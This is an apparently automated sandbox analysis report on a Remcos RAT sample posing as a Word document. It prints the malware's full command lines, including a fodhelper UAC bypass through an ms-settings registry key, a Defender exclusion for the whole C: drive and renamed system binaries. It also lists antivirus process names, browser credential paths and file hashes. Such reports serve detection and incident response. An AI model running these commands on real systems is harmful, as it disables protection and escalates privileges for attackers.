Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: unknown unknown

Uses taskkill to terminate processes

Source: C:\Users\Public\alpha.exe

Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "	Jump to behavior

Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQ3\
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managern.
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager404
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager404:0
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager404n.
Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, logs.dat.31.dr	Binary or memory string: [Program Manager]

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045B4C52 cpuid

31_2_045B4C52

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	0_2_0299DAA4
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02985A78
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	0_2_029A5E01
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: GetLocaleInfoA,	0_2_0298A7A0
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: GetLocaleInfoA,	0_2_0298A754
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02985B84
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	0_2_0299DAA4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	8_2_00007FF64B5751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	8_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	8_2_00007FF64B573140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	10_2_00007FF64B5751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	10_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	10_2_00007FF64B573140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	12_2_00007FF64B5751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	12_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	12_2_00007FF64B573140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	14_2_00007FF64B5751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	14_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	14_2_00007FF64B573140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	17_2_00007FF64B5751EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	17_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	17_2_00007FF64B573140
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	31_2_045C8404
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	31_2_045D243C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	31_2_045D2543
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	31_2_045D2610
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	31_2_045D2036
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	31_2_045D20C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	31_2_045D2313
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	31_2_045D1CD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	31_2_045D1F50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	31_2_045D1F9B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	31_2_0458F8D1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	31_2_045C88ED

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\xkn.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0298919C GetLocalTime,

0_2_0298919C

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0459B60D GetUserNameW,

31_2_0459B60D

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045C9190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

31_2_045C9190

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0298B71C GetVersionExA,

0_2_0298B71C

Source: C:\Users\Public\xkn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

31_2_0458BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		31_2_0458BB30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db		31_2_0458BB30

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\colorcpl.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3

Yara detected Remcos RAT

Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: cmd.exe

31_2_0458569A

Windows Analysis Report
#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1466663
Product:	CloudBasic
Start time:	08:55:56
Start date:	03.07.2024
Sample:	#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b9da5a47e1e68ef90c075dc14f8e2037
SHA1:	4ae96232817bf7b3919aa298efc7c0d18649ed9d
SHA256:	8dbccd1c7bdb8da3a34c2a4ac5c62fb6774ce2abac29caf899039d19a5d27555
Filetype:	Win32 Executable (generic) a (10002005/4) 99.81%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\gaban\logs.dat	data	AE19BACC9221372C637448D591CAFB06	81B882ECEBD44624C34A02361EE2BC008EEC4A28	649BD2D85E96CA21A0ABFB35145DA75915DC0A3E43FA9C4DEB775B1BBA5F30B2
C:\Users\Public\Libraries\PNO	ASCII text, with CRLF line terminators	A5EA0AD9260B1550A14CC58D2C39B03D	F0AEDF295071ED34AB8C6A7692223D22B6A19841	F1B2F662800122BED0FF255693DF89C4487FBDCF453D3524A42D4EC20C3D9C04
C:\Users\Public\Libraries\Pyemdbrd	data	93DB1FEB88FB94D374EC047F2A92A473	742BDAFB4F36FAFFEC4D64148872801E0D85004F	FF6CEDF6A3BD5FB08FB0A3DDA807B9E297F66652C5C237D00716916B5603A87E
C:\Users\Public\Libraries\Pyemdbrd.PIF	PE32 executable (GUI) Intel 80386, for MS Windows	B9DA5A47E1E68EF90C075DC14F8E2037	4AE96232817BF7B3919AA298EFC7C0D18649ED9D	8DBCCD1C7BDB8DA3A34C2A4AC5C62FB6774CE2ABAC29CAF899039D19A5D27555
C:\Users\Public\Libraries\drbdmeyP.pif	PE32 executable (GUI) Intel 80386, for MS Windows	C116D3604CEAFE7057D77FF27552C215	452B14432FB5758B46F2897AECCD89F7C82A727D	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
C:\Users\Public\Pyemdbrd.url	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF">), ASCII text, with CRLF line terminators	77E5BC66C26EE0BB84A1DACF4C1EF258	A4992EAF129F9D9162A10A6BC65CA8836AA58A93	F93B60936204F09F914E8C055E2570BDA112C26C804AD141B150F0306325FBDB
